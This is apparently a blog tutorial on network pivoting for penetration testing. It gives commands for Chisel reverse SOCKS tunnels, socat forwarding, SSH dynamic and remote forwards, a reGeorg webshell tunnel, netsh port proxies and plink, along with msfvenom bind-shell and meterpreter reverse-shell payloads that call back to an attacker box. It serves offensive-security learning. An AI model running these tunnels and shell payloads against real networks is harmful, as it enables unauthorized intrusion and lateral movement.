Pivoting techniques: Part 2
This post will cover some useful tools and commands for tunneling and pivoting about pen testing.
A few examples throughout the post will cover a basic scenario given a set of IP’s with the attacker running Kali Linux — map is shown below.
1) Chisel
A robust OS-agnostic tool to build out simple to complex tunnels. It was built using the client-server model. It's a great option if your target doesn’t have SSH built in.
Launching Chisel Server this example will listen on 5447.
chisel server --host 172.18.0.65 -p 5447 --socks5 --reverseLaunching the Chisle Client in this example will call Kali port 5447 and enable port 2600 for proxy chains on Kali.
./chisle_binary client 172.18.0.65:5447 R:2600:socksWithin your proxychains config on Kali (vim :$) update the ProxyList directive to
[ProxyList]
socks5 127.0.0.1 2600Now when using proxychains, your traffic will be piped through your client.
proxychains wget http://10.55.1.21/research.odt2) SOCAT
A lot you can do with socat. This example will forward traffic between Kali and an internal target by using the intermediary/public-facing target as a proxy.
This payload example will listen on 4991 for incoming connections. This bind shell will be executed as an internal, non-public target.
msfvenom -f exe -p windows/shell_bind_tcp LPORT=4991 -f exe > ib_4991.exeOn the intermediary target, move over and install socat via scp.
scp -r -i ssh-key /tmp/socat.rpm root@10.55.1.22:/tmp
yum install /tmp/socat.rpmMeow run socat. This will listen on its interface of 10.55.1.22 port 8080, then forward any request hitting 8080 onto the internal target, 10.55.1.21 port 4991.
socat tcp-listen:8080,bind=10.55.1.22,fork tcp:10.55.1.21:4991Finally, on Kali use Netcat to connect to socats listening to host: port.
nc -nv 10.55.1.22 80803) SSH Tunnels
If SSH is commonplace in your target environment you can build out SSH tunnels to accomplish your goal without dropping any extra tools. With SSH you can set up dynamic port forwarding, forward specific ports, or use the -J switch to treat targets as jump hosts.
Dynamic port forwarding.
Running this on your Kali machine with proxy chains will proxy traffic through 10.55.1.22 off to additional targets. You’ll need to update your socks port in the proxychains config to 2600, or whatever port of your choosing.
ssh -N -D 2600 root@10.55.1.22Remote Forwarding
Remote forwarding can be used to access internal resources (web servers, DB’s, etc) or catch reverse shells. You’ll need to allow GatewayPorts yes on the intermediate/proxy machine's sshd config for this to work.
Running from your attacking box, this example will SSH to 10.55.1.22 and forward requests going to locahost:8081 onto 10.55.1.21:80.
ssh -R 8081:10.55.1.21:80 root@10.55.1.22So running this command and opening Firefox on Kali, going to http://localhost:8081 will display contents of http://10.55.1.21/
The below example will ssh to 10.55.1.22, listen on 10.55.1.22 port 4444, then forward to localhost on Kali port 4447. This will work to catch a callback from a reverse shell on an internal target.
ssh -R 10.55.1.22:4444:127.0.0.1:4447 root@10.55.1.22Setting up the reverse shell payload you’ll need to set the LHOST to 10.55.1.22 port 4444, then listen on Kali’s localhost 4447. Example below.
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.55.1.22 LPORT=44444) reGeorg
reGeorg functions as sort of a web shell tunnel. A useful tool if you have limited access to your intermediary/public-facing web server or if you want your proxied traffic to blend into normal web traffic. It works as a client-server tool and you’ll need to use proxychains along with it.
The reGeorg client/webshell is written in a few different web languages. Once you drop the client webshell on target, you’ll run the reGeorg python script from your attacking box. This example will have your proxychains config set to port 2600.
python reGeorg.py -p 2600 -u http://10.55.1.22/wordpress/re-tunnel.phpNow when you use proxychains, your traffic will be tunneled through 10.55.1.22 over port 80.
5) Netsh
Netsh is a built-in Windows CLI binary which amongst other things can be used to port forward. This example will listen on 10.55.1.21 interface on port 5446 and will forward requests hitting 5446 off to 10.55.1.20 port 5985.
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.55.1.21 connectport=5985 connectaddress=10.55.1.20You can also use netsh to open ports on the firewall, which you may need to do when you smash open one of these ports.
netsh advfirewall firewall add rule name=fwd dir=in action=allow proto6) Plink
Plink.exe is a CLI binary based on putty. It has similar capabilities to other individual binaries discussed. You can use it as a simple SSH command-line client on Windows (if none are built-in). You can also use it to create local or reverse tunnels.
Ran from the internal Windows box (10.55.1.21) you will create a reverse tunnel on 10.55.1.22 listening on all interfaces (0.0.0.0) port 8181. Then forward anything that hits 8181 onto localhost (aka .21 Windows box) port 80.
.\plink.exe -ssh -l root -pw toor -R 0.0.0.0:8181:127.0.0.1:80 10.55.1.22